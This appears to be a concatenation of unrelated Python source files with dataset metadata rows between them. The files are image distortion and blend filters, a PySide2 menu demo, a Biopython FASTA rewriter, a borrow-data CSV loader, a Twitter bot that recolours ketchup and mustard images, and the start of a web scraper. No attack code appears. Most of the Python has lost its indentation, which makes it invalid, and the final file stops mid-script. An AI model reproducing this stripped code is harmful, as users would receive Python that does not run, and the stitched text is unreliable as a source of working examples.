def screen(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(SCREEN, img1, _q(img2).texture, alpha, dx, dy))
def overlay(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(OVERLAY, img1, _q(img2).texture, alpha, dx, dy))
def hardlight(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(HARDLIGHT, img1, _q(img2).texture, alpha, dx, dy))
def hue(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(HUE, img1, _q(img2).texture, alpha, dx, dy))
def glow(img, intensity=0.5, amount=1):
""" Returns the image blended with a blurred version, yielding a glowing effect.
- intensity: the opacity of the blur (0.0-1.0).
- amount : the number of times to blur.
"""
b = blur(img, kernel=9, scale=1.0, amount=max(1, amount))
return add(img, b, alpha=intensity)
def bloom(img, intensity=0.5, amount=1, threshold=0.3):
""" Returns the image blended with a blurred brightpass version, yielding a "magic glow" effect.
- intensity: the opacity of the blur (0.0-1.0).
- amount : the number of times to blur.
- threshold: the luminance threshold of pixels that light up.
"""
b = brightpass(img, threshold)
b = blur(b, kernel=9, scale=1.0, amount=max(1, amount))
return add(img, b, alpha=intensity)
def distortion_mixin(type, dx, dy, **kwargs):
# Each distortion filter has specific parameters to tweak the effect (usually radius and zoom).
# Returns the magnitude m and intensity i from the keyword arguments,
# which are the parameters expected by the Distortion Filter class.
if type == BUMP:
m = kwargs.get("radius", 0.5)
i = lerp(-m*20, m*0.25, max(0, kwargs.get("zoom", 0.5))**0.1)
elif type == DENT:
m = max(0, 2 * kwargs.get("radius", 0.5))
i = max(0, 1 * kwargs.get("zoom", 0.5))
elif type == PINCH:
m = 1.0
i = max(0.2, 2 * kwargs.get("zoom", 0.75))
elif type == TWIRL:
m = kwargs.get("radius", 1.0)
i = radians(kwargs.get("angle", 180.0))
elif type == SPLASH:
m = kwargs.get("radius", 0.5)
i = 0
elif type == MIRROR:
m = int(kwargs.get("horizontal", True))
i = int(kwargs.get("vertical", True))
dx = clamp(dx, -0.5, 1.5)
dy = clamp(dy, -0.5, 1.5)
elif type == STRETCH:
m = max(0, kwargs.get("radius", 0.5))
i = max(0, min(1, 0.5 * kwargs.get("zoom", 1.0)))
else:
m = 0.5
i = 0.5
return dx, dy, m, i
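# For example, a TWIRL with radius=1.0 and angle=90 maps to m=1.0 and i=radians(90) (about 1.5708),
# while dx and dy pass through unchanged; each distortion type has its own mapping above.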
#def bump(img, dx=0.5, dy=0.5, radius=0.5, zoom=0.5)
def bump(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a bump distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in.
"""
dx, dy, m, i = distortion_mixin(BUMP, dx, dy, **kwargs)
return filter(img, filter=Distortion(BUMP, img, dx-0.5, dy-0.5, m, i))
#def dent(img, dx=0.5, dy=0.5, radius=0.5, zoom=0.5)
def dent(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a dent distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in.
"""
dx, dy, m, i = distortion_mixin(DENT, dx, dy, **kwargs)
return filter(img, filter=Distortion(DENT, img, dx-0.5, dy-0.5, m, i))
#def pinch(img, dx=0.5, dy=0.5, zoom=0.75)
def pinch(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a pinch distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- zoom: the amount of bulge (0.1-0.5) or pinch (0.5-1.0):
"""
dx, dy, m, i = distortion_mixin(PINCH, dx, dy, **kwargs)
return filter(img, filter=Distortion(PINCH, img, dx-0.5, dy-0.5, m, i))
#def twirl(img, dx=0.5, dy=0.5, radius=1.0, angle=180.0)
def twirl(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a twirl distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the effect, proportional to the image size.
- angle: the amount of rotation in degrees.
"""
dx, dy, m, i = distortion_mixin(TWIRL, dx, dy, **kwargs)
return filter(img, filter=Distortion(TWIRL, img, dx-0.5, dy-0.5, m, i))
#def splash(img, dx=0.5, dy=0.5, radius=0.5)
def splash(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a light-tunnel distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the unaffected area, proportional to the image size.
"""
dx, dy, m, i = distortion_mixin(SPLASH, dx, dy, **kwargs)
return filter(img, filter=Distortion(SPLASH, img, dx-0.5, dy-0.5, m, i))
#def stretch(img, dx=0.5, dy=0.5, radius=0.5, zoom=1.0)
def stretch(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a zoom box distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in (0.0-2.0, where 1.0 means 1x zoomed in, or 200%).
"""
dx, dy, m, i = distortion_mixin(STRETCH, dx, dy, **kwargs)
return filter(img, filter=Distortion(STRETCH, img, dx-0.5, dy-0.5, m, i))
#def mirror(img, dx=0.5, dy=0.5, horizontal=True, vertical=True)
def mirror(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image mirrored along horizontal axis dx and vertical axis dy.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- horizontal: when True, mirrors the image horizontally.
- vertical : when True, mirrors the image vertically.
"""
dx, dy, m, i = distortion_mixin(MIRROR, dx, dy, **kwargs)
return filter(img, filter=Distortion(MIRROR, img, dx-0.5, dy-0.5, m, i))
def dropshadow(img, alpha=0.5, amount=2):
""" Returns a blurred and grayscale version of the image.
If filters are not supported, returns a grayscale version without blur (using Image.color).
"""
if not SUPPORTED:
t = texture(img)
else:
t = blur(img, kernel=5, amount=amount).texture
img = isinstance(img, Image) and img.copy(t) or Image(t)
img.color.rgba = (0,0,0, alpha)
return img
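# Example: a minimal sketch applying a distortion and a drop shadow defined above.
# Illustrative only and not called anywhere; "photo.png" is a placeholder path.
def _example_distortions():
    img = Image("photo.png")
    bumped = bump(img, dx=0.5, dy=0.5, radius=0.5, zoom=0.75)
    shadow = dropshadow(img, alpha=0.5, amount=2)
    return bumped, shadow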
#--- ONSCREEN FILTERS --------------------------------------------------------------------------------
# These can be used directly as filter parameter for the image() command.
# This may be faster because no offscreen buffer is used to render the effect.
def inverted():
return Invert(None)
def colorized(color=(1,1,1,1), bias=(0,0,0,0)):
return Colorize(None, vec4(*color), vec4(*bias))
def adjusted(mode, v):
if mode == BRIGHTNESS:
return BrightnessAdjustment(None, v)
if mode == CONTRAST:
return ContrastAdjustment(None, v)
if mode == SATURATION:
return SaturationAdjustment(None, v)
if mode == HUE:
return HueAdjustment(None, v)
def desaturated():
return SaturationAdjustment(None, 0.0)
def blurred(scale=1.0):
return Gaussian3x3Blur(None, scale)
def masked(img, alpha=1.0, dx=0, dy=0):
return AlphaMask(None, _q(img).texture, alpha, dx, dy)
def blended(mode, img, alpha=1.0, dx=0, dy=0):
return Blend(mode, None, _q(img).texture, alpha, dx, dy)
def distorted(type, dx=0.5, dy=0.5, **kwargs):
dx, dy, m, i = distortion_mixin(type, dx, dy, **kwargs)
return Distortion(type, None, dx-0.5, dy-0.5, m, i) | 39.52576 | 106 | 0.6011 |
d5ad3c70851e4863651dd23249ee7e10155e39d6 | 11,146 | py | Python | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | 1 | 2020-02-11T08:22:28.000Z | 2020-02-11T08:22:28.000Z | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | null | null | null | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PySide2.QtCore import Qt
from PySide2.QtGui import QKeySequence
from PySide2.QtWidgets import (QAction, QActionGroup, QApplication, QFrame,
QLabel, QMainWindow, QMenu, QMessageBox, QSizePolicy, QVBoxLayout,
QWidget)
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
widget = QWidget()
self.setCentralWidget(widget)
topFiller = QWidget()
topFiller.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.infoLabel = QLabel(
"<i>Choose a menu option, or right-click to invoke a context menu</i>",
alignment=Qt.AlignCenter)
self.infoLabel.setFrameStyle(QFrame.StyledPanel | QFrame.Sunken)
bottomFiller = QWidget()
bottomFiller.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
vbox = QVBoxLayout()
vbox.setContentsMargins(5, 5, 5, 5)
vbox.addWidget(topFiller)
vbox.addWidget(self.infoLabel)
vbox.addWidget(bottomFiller)
widget.setLayout(vbox)
self.createActions()
self.createMenus()
message = "A context menu is available by right-clicking"
self.statusBar().showMessage(message)
self.setWindowTitle("Menus")
self.setMinimumSize(160,160)
self.resize(480,320)
def contextMenuEvent(self, event):
menu = QMenu(self)
menu.addAction(self.cutAct)
menu.addAction(self.copyAct)
menu.addAction(self.pasteAct)
menu.exec_(event.globalPos())
def newFile(self):
self.infoLabel.setText("Invoked <b>File|New</b>")
def open(self):
self.infoLabel.setText("Invoked <b>File|Open</b>")
def save(self):
self.infoLabel.setText("Invoked <b>File|Save</b>")
def print_(self):
self.infoLabel.setText("Invoked <b>File|Print</b>")
def undo(self):
self.infoLabel.setText("Invoked <b>Edit|Undo</b>")
def redo(self):
self.infoLabel.setText("Invoked <b>Edit|Redo</b>")
def cut(self):
self.infoLabel.setText("Invoked <b>Edit|Cut</b>")
def copy(self):
self.infoLabel.setText("Invoked <b>Edit|Copy</b>")
def paste(self):
self.infoLabel.setText("Invoked <b>Edit|Paste</b>")
def bold(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Bold</b>")
def italic(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Italic</b>")
def leftAlign(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Left Align</b>")
def rightAlign(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Right Align</b>")
def justify(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Justify</b>")
def center(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Center</b>")
def setLineSpacing(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Set Line Spacing</b>")
def setParagraphSpacing(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Set Paragraph Spacing</b>")
def about(self):
self.infoLabel.setText("Invoked <b>Help|About</b>")
QMessageBox.about(self, "About Menu",
"The <b>Menu</b> example shows how to create menu-bar menus "
"and context menus.")
def aboutQt(self):
self.infoLabel.setText("Invoked <b>Help|About Qt</b>")
def createActions(self):
self.newAct = QAction("&New", self, shortcut=QKeySequence.New,
statusTip="Create a new file", triggered=self.newFile)
self.openAct = QAction("&Open...", self, shortcut=QKeySequence.Open,
statusTip="Open an existing file", triggered=self.open)
self.saveAct = QAction("&Save", self, shortcut=QKeySequence.Save,
statusTip="Save the document to disk", triggered=self.save)
self.printAct = QAction("&Print...", self, shortcut=QKeySequence.Print,
statusTip="Print the document", triggered=self.print_)
self.exitAct = QAction("E&xit", self, shortcut="Ctrl+Q",
statusTip="Exit the application", triggered=self.close)
self.undoAct = QAction("&Undo", self, shortcut=QKeySequence.Undo,
statusTip="Undo the last operation", triggered=self.undo)
self.redoAct = QAction("&Redo", self, shortcut=QKeySequence.Redo,
statusTip="Redo the last operation", triggered=self.redo)
self.cutAct = QAction("Cu&t", self, shortcut=QKeySequence.Cut,
statusTip="Cut the current selection's contents to the clipboard",
triggered=self.cut)
self.copyAct = QAction("&Copy", self, shortcut=QKeySequence.Copy,
statusTip="Copy the current selection's contents to the clipboard",
triggered=self.copy)
self.pasteAct = QAction("&Paste", self, shortcut=QKeySequence.Paste,
statusTip="Paste the clipboard's contents into the current selection",
triggered=self.paste)
self.boldAct = QAction("&Bold", self, checkable=True,
shortcut="Ctrl+B", statusTip="Make the text bold",
triggered=self.bold)
boldFont = self.boldAct.font()
boldFont.setBold(True)
self.boldAct.setFont(boldFont)
self.italicAct = QAction("&Italic", self, checkable=True,
shortcut="Ctrl+I", statusTip="Make the text italic",
triggered=self.italic)
italicFont = self.italicAct.font()
italicFont.setItalic(True)
self.italicAct.setFont(italicFont)
self.setLineSpacingAct = QAction("Set &Line Spacing...", self,
statusTip="Change the gap between the lines of a paragraph",
triggered=self.setLineSpacing)
self.setParagraphSpacingAct = QAction("Set &Paragraph Spacing...",
self, statusTip="Change the gap between paragraphs",
triggered=self.setParagraphSpacing)
self.aboutAct = QAction("&About", self,
statusTip="Show the application's About box",
triggered=self.about)
self.aboutQtAct = QAction("About &Qt", self,
statusTip="Show the Qt library's About box",
triggered=self.aboutQt)
self.aboutQtAct.triggered.connect(QApplication.instance().aboutQt)
self.leftAlignAct = QAction("&Left Align", self, checkable=True,
shortcut="Ctrl+L", statusTip="Left align the selected text",
triggered=self.leftAlign)
self.rightAlignAct = QAction("&Right Align", self, checkable=True,
shortcut="Ctrl+R", statusTip="Right align the selected text",
triggered=self.rightAlign)
self.justifyAct = QAction("&Justify", self, checkable=True,
shortcut="Ctrl+J", statusTip="Justify the selected text",
triggered=self.justify)
self.centerAct = QAction("&Center", self, checkable=True,
shortcut="Ctrl+C", statusTip="Center the selected text",
triggered=self.center)
self.alignmentGroup = QActionGroup(self)
self.alignmentGroup.addAction(self.leftAlignAct)
self.alignmentGroup.addAction(self.rightAlignAct)
self.alignmentGroup.addAction(self.justifyAct)
self.alignmentGroup.addAction(self.centerAct)
self.leftAlignAct.setChecked(True)
def createMenus(self):
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenu.addAction(self.newAct)
self.fileMenu.addAction(self.openAct)
self.fileMenu.addAction(self.saveAct)
self.fileMenu.addAction(self.printAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.exitAct)
self.editMenu = self.menuBar().addMenu("&Edit")
self.editMenu.addAction(self.undoAct)
self.editMenu.addAction(self.redoAct)
self.editMenu.addSeparator()
self.editMenu.addAction(self.cutAct)
self.editMenu.addAction(self.copyAct)
self.editMenu.addAction(self.pasteAct)
self.editMenu.addSeparator()
self.helpMenu = self.menuBar().addMenu("&Help")
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
self.formatMenu = self.editMenu.addMenu("&Format")
self.formatMenu.addAction(self.boldAct)
self.formatMenu.addAction(self.italicAct)
self.formatMenu.addSeparator().setText("Alignment")
self.formatMenu.addAction(self.leftAlignAct)
self.formatMenu.addAction(self.rightAlignAct)
self.formatMenu.addAction(self.justifyAct)
self.formatMenu.addAction(self.centerAct)
self.formatMenu.addSeparator()
self.formatMenu.addAction(self.setLineSpacingAct)
self.formatMenu.addAction(self.setParagraphSpacingAct)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| 38.836237 | 87 | 0.649919 |
fcf62b3e18db7eca179f7349d36eec1a2f948c8b | 348 | py | Python | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 66 | 2017-01-11T14:37:31.000Z | 2022-03-20T23:23:45.000Z | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 8 | 2019-12-14T23:44:27.000Z | 2021-01-05T02:04:10.000Z | code/ch15/seqiofile3.py | raionik/Py4Bio | f95ba16ef295f4889149123c5f76419d38077bc5 | [
"MIT"
] | 32 | 2017-08-21T11:57:55.000Z | 2021-07-22T00:42:21.000Z | from Bio import SeqIO
INPUT_FILE = 'fasta22_out.fas'
OUTPUT_FILE = 'fasta33.fas'
with open(INPUT_FILE) as in_fh:
with open(OUTPUT_FILE, 'w') as out_fh:
for record in SeqIO.parse(in_fh,'fasta'):
# Modify description
record.description += '[Rattus norvegicus]'
SeqIO.write([record], out_fh, 'fasta')
| 29 | 55 | 0.643678 |
0388131b53f1e02b2d450b19132bce160c81ff92 | 835 | py | Python | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 51 | 2019-02-01T19:43:37.000Z | 2022-03-16T09:07:03.000Z | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 2 | 2019-02-23T18:54:22.000Z | 2019-11-09T01:30:32.000Z | salamander/get_borrow.py | cclauss/statarb | a59366f70122c355fc93a2391362a3e8818a290e | [
"Apache-2.0"
] | 35 | 2019-02-08T02:00:31.000Z | 2022-03-01T23:17:00.000Z | import pandas as pd
import argparse
import glob
def get_borrow(locates_dir):
result_dfs = []
for ff in sorted(glob.glob(locates_dir + "/locates/Historical_Avail_US_Weekly_*")):
print("Loading", ff)
df = pd.read_csv(ff, parse_dates=['history_date'],
usecols=['history_date', 'sedol', 'shares', 'fee', 'ticker'])
df = df.rename(columns={'history_date': 'date', 'ticker': 'symbol'})
result_dfs.append(df)
result_df = pd.concat(result_dfs)
result_df.set_index("date", inplace=True)
result_df.to_csv(r"%s/locates/borrow.csv" % locates_dir, "|")
print(result_df)
parser = argparse.ArgumentParser()
parser.add_argument("--locates_dir", help="the directory to the locates folder", type=str, default='.')
args = parser.parse_args()
get_borrow(args.locates_dir)
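# Usage sketch (assuming the weekly locate CSVs live under <locates_dir>/locates):
#   python get_borrow.py --locates_dir .
# which writes the combined data to ./locates/borrow.csv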
| 37.954545 | 103 | 0.671856 |
bd29fda4b61b3b4677a3e5ccab1c901a35ea203d | 25 | py | Python | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | 2 | 2020-06-05T03:21:03.000Z | 2021-03-04T23:38:36.000Z | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | null | null | null | euc/kingsong/__init__.py | mrk-its/euc.kingsong | 5f29c11bd88bea5d6c89260430838c616f6518ce | [
"MIT"
] | null | null | null | from .kingsong import KS
| 12.5 | 24 | 0.8 |
57dc66e5d3d9fd175fca8aaef1065ae5141f62f1 | 9,568 | py | Python | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | null | null | null | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | 4 | 2021-06-08T21:31:52.000Z | 2022-03-12T00:28:43.000Z | chupbot.py | NateDimick/chupeverything | a2c5a7c9f9c9a1371d5591953a314d59b07ed124 | [
"MIT"
] | null | null | null | """
Chupbot phase 2: chup looks fine but must looks like shit
author: Nate Dimick
"""
import tweepy as tp
import json
from PIL import Image, ImageDraw
import numpy as np
from colormath.color_diff import delta_e_cie2000
from colormath.color_objects import LabColor, sRGBColor
from colormath.color_conversions import convert_color
from os import sep
from os.path import dirname, realpath, join
import sys
from random import sample
from datetime import datetime, date, time
from time import sleep
from platform import system
import socket
import traceback
def get_script_path():
return dirname(realpath(sys.argv[0]))
def get_json(filename, mode='r'):
return open(join(get_script_path(), "json", filename), mode)
letters = 'abcdefghijklmnopqrstuvwxyz1234567890'
font = {}
with get_json("chars.json") as f:
font = json.load(f)
cmap = {}
for c, box in zip(letters, font):
cmap[c] = box
font = cmap
def put_word_on_area(base_img, word, area, slope=0, text=[20,30], color=[0,0,0]):
# base_img: an Image
# word: a string
# area: 4 tuple box
raw_text = Image.open(get_script_path() + sep + "images" + sep + 'font.jpg')
x = area[0]
y = area[1]
s = slope
for l in word:
char = raw_text.crop(font[l])
char = char.resize([text[0], text[1]], resample=Image.BICUBIC)
char = replace_color3(char, [0,0,0], color, tolerance=200, mode='w')
base_img.paste(char, [x, y - s])
x += text[0] + 2
s += slope
def replace_color3(image, color, replacement, tolerance, mode):
"""
replaces all pixels that are within the tolerance of cie2000 color distance from the given color with the replacement color, altered to reflect the difference
"""
# make image a np array to easily edit it
pic = np.array(image)
# get the LabColor of the target color to replace
lcolor = sRGBColor(color[0], color[1], color[2])
lcolor = convert_color(lcolor, LabColor)
try:
with get_json("color_diffs.json") as f:
diff_store = json.load(f)
except:
        diff_store = {} # store all color differences so that some calculations don't have to be repeated. Dynamic programming FTW. TODO: store this to a file to make repeated operations faster.
for y in range(len(pic)):
for x in range(len(pic[0])): # iterate through all pixels in the image
pixel = pic[y, x]
diff = diff_store.get(str(tuple(pixel)) + mode, -1) # get the difference. -1 if no difference exits yet.
if diff < 0:
diff = color_distance(lcolor, tuple(pixel)) # calculate the difference and store it.
diff_store[str(tuple(pixel)) + mode] = diff
if diff < tolerance: # if the color difference/ distance is less than the given tolerance
err = []
for v in range(3):
err.append(pixel[v] - color[v]) # calculate the error of the to be replaced pixel from the target color
bc = better_color(replacement, err, mode=4) # get the "better color" in what i call value cap mode
pic[y, x] = np.array(bc)
with get_json("color_diffs.json", mode='w') as f:
json.dump(diff_store, f)
return Image.fromarray(pic)
def color_distance(c1, c2):
# finds difference between a LabColor (assumed to be constant through a loop) and an rgb color
color1 = c1
color2 = c2
color2 = sRGBColor(color2[0], color2[1], color2[2])
color2 = convert_color(color2, LabColor)
de = delta_e_cie2000(color1, color2)
return de
def better_color(color, error, mode=1, debug=False):
"""
chooses the better resulting color and error combination - to cap the sum of original and error at 0 and 255 or to allow overflow
modes:
1 = larger chroma value (default)
2 = least rgb error
3 = mod only (c + e) % 255
4 = cap only
"""
result = [c + e for c, e in zip(color, error)]
mod = [c % 255 for c in result]
cap = [c for c in result]
for i in range(len(cap)):
if cap[i] > 255:
cap[i] = 255
if cap[i] < 0:
cap[i] = 0
if mode == 1:
mod_chroma = max(mod) - min(mod)
cap_chroma = max(cap) - min(cap)
if mod_chroma > cap_chroma:
result = mod
else:
result = cap
elif mode == 2:
mod_err = sum(m - c for m, c in zip(mod, color))
cap_err = sum(a - c for a, c in zip(cap, color))
if mod_err < cap_err:
result = mod
else:
result = cap
elif mode == 3:
result = mod
elif mode == 4:
result = cap
if debug:
print("input {}, got mod{} and cap{}, chose {}".format(color, mod, cap, result))
vis = Image.new('RGB', [400, 400])
vd = ImageDraw.Draw(vis)
vd.rectangle([0, 0, 200, 400], fill=tuple(color))
vd.rectangle([200, 0, 400, 200], fill=tuple(mod))
vd.rectangle([200, 200, 400, 400], fill=tuple(cap))
vis.show()
return result
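# Worked example for better_color() mode 1 (added illustration): color=[200, 40, 90] with
# error=[80, 10, -100] gives result=[280, 50, -10]; mod = [25, 50, 245] (each value % 255,
# chroma 220) and cap = [255, 50, 0] (chroma 255), so the capped version wins here.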
def brand(image, bname, sauce_type):
if sauce_type == 'must':
put_word_on_area(image, bname, [160, 200, 240, 230], text=[15,30])
else:
put_word_on_area(image, bname, [150, 200, 260, 230])
def flavor(image, text, color, sauce_type):
if sauce_type == 'must':
put_word_on_area(image, text, [120, 253, 195, 285], slope=-1, text=[17, 32], color=color)
else:
put_word_on_area(image, text, [114, 250, 200, 290], slope=-1, text=[20, 32], color=color)
image = sauce(image, color, sauce_type)
return image
def sauce(image, color, sauce):
if sauce == 'chup':
image = replace_color3(image, [245, 186, 126], color, 42.5, 'c') # this is the most common color
elif sauce == 'must':
image = replace_color3(image, [221, 202, 117], color, 14.5, 'm')
return image
def turn_word_to_color(word, cap=True):
"""
    synthesize a color from a given word, based on synesthesia kinda. start with the color of the first letter, then accumulate error over the rest of the word to make the color unique, but not brown.
"""
with get_json("synesthesia.json") as f:
colors = json.load(f)
wc = []
for l in word.lower():
wc.append(colors[l])
dominant_color = wc[0]
err = [0,0,0]
for x in range(1, len(word)):
l = word[x]
for y in range(3):
e = colors[l][y] - dominant_color[y]
err[y] += e
return better_color(dominant_color, err)#, debug=True)
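# Sketch of the synthesis with made-up letter colors (the real values come from synesthesia.json):
# if 'h' -> [200, 40, 90] and 'i' -> [20, 60, 10], then for "hi" the dominant color is [200, 40, 90]
# and the accumulated error is [20-200, 60-40, 10-90] = [-180, 20, -80], which better_color() then
# resolves into the final color.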
def generate_tweet(api, dm=True):
    sauce_type = sample(['chup', 'chup', 'chup', 'chup', 'chup', 'chup', 'chup', 'must'], 1)[0] # because the quality of must tweets is lower, they get a 1/8 chance
with get_json("words.json") as f:
im = Image.open(get_script_path() + sep + 'images' + sep + 'mayo{}_uncompressed.png'.format(sauce_type))
words = json.load(f)
flavors = words[0]
brands = words[1]
todays_flavor = sample(flavors, 1)[0]
todays_brand = sample(brands, 1)[0]
chup = turn_word_to_color(todays_flavor)
with get_json("skeletons.json") as f2: # get one tweet skeleton
statuses = json.load(f2)
template = sample(statuses, 1)[0]
if system() == 'Linux' and dm:
bot_api.send_direct_message(creds['owner'], 'new tweet incoming: {}-{}-{}'.format(todays_brand, todays_flavor, chup))
else:
print(chup, end=' ')
brand(im, todays_brand, sauce_type) # puts the "brand" name where it belongs
im = flavor(im, todays_flavor, chup, sauce_type) # recolors the image and puts the "flavor" on the image
im.save(get_script_path() + sep + 'images' + sep + 'tweetthis.png') # save the image for tweeting
try:
return template.format(todays_brand.capitalize(), todays_flavor.capitalize(), sauce_type)
except:
print(template)
exit()
if __name__ == "__main__":
# get credentials
creds = json.load(get_json("tokens.json")) # NOTE that this file is not included in the repo for security purposes
auth = tp.OAuthHandler(creds['api_key'], creds['api_secret'])
auth.set_access_token(creds['access'], creds['access_secret'])
bot_api = tp.API(auth)
try:
with get_json("settings.json") as sfile:
settings = json.load(sfile)
status = generate_tweet(bot_api, dm=settings["new_tweet_dm"])
if not settings['debug']:
bot_api.update_with_media(join(get_script_path() ,'images' , 'tweetthis.png'), status)
else:
print(status)
except Exception as e:
with open(join(get_script_path(), "err_log.txt"), "a") as f:
f.write("{}: {}\n-------\n".format(datetime.now().isoformat(), traceback.format_exc())) # collect errors in a file
bot_api.send_direct_message(creds['owner'], '{} occurred and I didn\'t tweet Please fix and program better'.format(e))
"""
notes on the color synthesis:
to mod or to cap?
mod might lead to more true colors (nate == yellow)
cap leads to fun colors (nate == pink)
examples (if two, first is mod, second is cap)
shale: pale blue, bright yellow
aaron: jade both ways
talya: pastel violet, dark yellow
roman: pastel yellow, green
ryan: same as roman
tess: brown, purple
chuck: dull red both ways
larry: olive grey, maroon
kerry: dull pink, magenta
""" | 38.736842 | 203 | 0.615176 |
f80373c0d219469676db516240231cb1d4765c33 | 3,106 | py | Python | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 2 | 2020-11-28T13:54:18.000Z | 2020-11-30T12:43:45.000Z | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 4 | 2020-12-02T18:25:35.000Z | 2020-12-16T13:13:52.000Z | Serveur/setup_db.py | EvannBerthou/DevoirIUT | ecc11190ad94a651a59bdb247432f71499958ffb | [
"MIT"
] | 2 | 2020-12-02T18:27:09.000Z | 2021-03-17T18:03:33.000Z | import sqlite3
import requests
from bs4 import BeautifulSoup
from werkzeug.security import generate_password_hash
import xml.etree.ElementTree as ET
html = requests.get('http://chronos.iut-velizy.uvsq.fr/EDT/gindex.html').content
soup = BeautifulSoup(html, features='html.parser')
options = soup.find_all('option')#.text.strip().split('\n')
pages = [opt.get('value') for opt in options if opt.get('value') != None]
